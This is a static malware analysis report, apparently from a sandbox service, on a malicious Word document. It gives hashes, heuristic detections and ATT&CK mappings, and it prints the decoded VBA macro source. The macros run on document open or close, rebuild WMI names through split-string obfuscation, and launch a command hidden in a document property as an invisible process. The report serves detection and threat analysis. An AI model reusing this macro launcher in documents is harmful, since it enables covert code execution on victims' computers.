Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d69b216776dbb710…

MALICIOUS

Office (OLE)

270.0 KB Created: 2018-05-17 20:23:00 Authoring application: Microsoft Office Word First seen: 2019-09-30
MD5: f19189e08ce01fd83c9929dfce5d79a4 SHA-1: e3f8e22c6e5ca6800dc5a4db9cf0e1f101e886f2 SHA-256: d69b216776dbb71071efb6de2a7ef1f82bf1687d856612ead73c549a6d200dab
342 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1203 Exploitation for Client Execution

The sample contains VBA macros, including AutoClose and Document_Open, which are commonly used to initiate malicious actions. The script uses obfuscated strings to reconstruct the WMI service name 'winmgmts:\\.\root\cimv2:Win32_Process' and then calls the Create method to launch a process. This indicates an attempt to execute arbitrary code on the victim's system, likely to download and run a secondary payload.

Heuristics 9

  • ClamAV: Doc.Malware.Valyria-6923037-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6923037-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATE
    VBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5714 bytes
SHA-256: c561e3caa971fffdb566e5eac8f2c2641e7d3696df3c67c2b3406d7ee70d7a5a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public Function oCINtECFoiZZ() As Variant
    Dim oYsvvHGpyNAl As DocumentProperty
    For Each oYsvvHGpyNAl In ActiveDocument.BuiltInDocumentProperties
        If oYsvvHGpyNAl.Name = "C" & "o" & "m" & "p" & "a" & "n" & "y" Then
            Dim zgpDyYsowvjC As String
            zgpDyYsowvjC = Replace(oYsvvHGpyNAl.Value, "!<%#>+=*})$]{&([_?-/", "")
            Const HIDDEN_WINDOW = 0
            Set NyRRsIyWHHtD = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "\" & "\" & "." & "\" & "r" & "o" & "o" & "t" & "\" & "c" & "i" & "m" & "v" & "2")
            Set CmFJiLnYnxFF = NyRRsIyWHHtD.Get("W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s" & "S" & "t" & "a" & "r" & "t" & "u" & "p")
            Set oJcxTgEMEZCd = CmFJiLnYnxFF.SpawnInstance_
            oJcxTgEMEZCd.ShowWindow = HIDDEN_WINDOW
            Set UXTFKvnzifDS = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "\" & "\" & "." & "\" & "r" & "o" & "o" & "t" & "\" & "c" & "i" & "m" & "v" & "2" & ":" & "W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s")
            UXTFKvnzifDS.Create zgpDyYsowvjC, Null, oJcxTgEMEZCd, gUCshaKrmBMP
        End If
    Next
End Function


Private Sub Document_Open()
Call doStuffBiatch
End Sub

Attribute VB_Name = "NewMacros"
Sub Auto_Close()
    ukszYtOmZvKp
End Sub

Sub AutoClose()
    ukszYtOmZvKp
End Sub

Public Function ukszYtOmZvKp() As Variant
    Dim LFOFpVUwMumQ As DocumentProperty
    For Each LFOFpVUwMumQ In ActiveDocument.BuiltInDocumentProperties
        If LFOFpVUwMumQ.Name = "C" & "o" & "m" & "p" & "a" & "n" & "y" Then
            Dim IhlYgvEmaKBv As String
            IhlYgvEmaKBv = Replace(LFOFpVUwMumQ.Value, "=}*&<_(%{)#-][+!?/$>", "")
            Const HIDDEN_WINDOW = 0
            Set BvsQYrdVtkyQ = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "\" & "\" & "." & "\" & "r" & "o" & "o" & "t" & "\" & "c" & "i" & "m" & "v" & "2")
            Set tnDljCtwvcFA = BvsQYrdVtkyQ.Get("W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s" & "S" & "t" & "a" & "r" & "t" & "u" & "p")
            Set otYxhAcYiLFm = tnDljCtwvcFA.SpawnInstance_
            otYxhAcYiLFm.ShowWindow = HIDDEN_WINDOW
            Set VmATsmcJgLQW = GetObject("w" & "i" & "n" & "m" & "g" & "m" & "t" & "s" & ":" & "\" & "\" & "." & "\" & "r" & "o" & "o" & "t" & "\" & "c" & "i" & "m" & "v" & "2" & ":" & "W" & "i" & "n" & "3" & "2" & "_" & "P" & "r" & "o" & "c" & "e" & "s" & "s")
            VmATsmcJgLQW.Create IhlYgvEmaKBv, Null, otYxhAcYiLFm, qHlsjUnjgSpi
        End If
    Next
End Function

Attribute VB_Name = "Module1"
Sub doStuffBiatch()
    Dim thisDocument As Document
    Set thisDocument = ActiveDocument
    Dim numberOfTables As Integer
    Dim Tb As Table
    Dim defaultString As String
    defaultString = "*Data from external source not loaded"
    Dim MyValue
    Dim ESI As String
    Dim resultComparison As Integer
    
    numberOfTables = thisDocument.Tables.Count
    
    For TableNumber = 2 To numberOfTables:
        'Debug.Print TableNumber
        numberOfRows = thisDocument.Tables(TableNumber).Rows.Count
        numberOfCol = thisDocument.Tables(TableNumber).Columns.Count
        Dim cellContent As String
        For fila = 2 To numberOfRows:
            For col = 2 To numberOfCol:
                cellContent = thisDocument.Tables(TableNumber).Cell(fila, col).Range.Text
                If InStr(1, cellContent, defaultString, vbTextCompare) = 1 Then
                    Debug.Print "True como una catedral"
                    If fila = 2 Then
                        MyValue = ((CLng(4 * Rnd) + 1) / 10)
                    ElseIf fila = 3 Then
                        MyValu
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.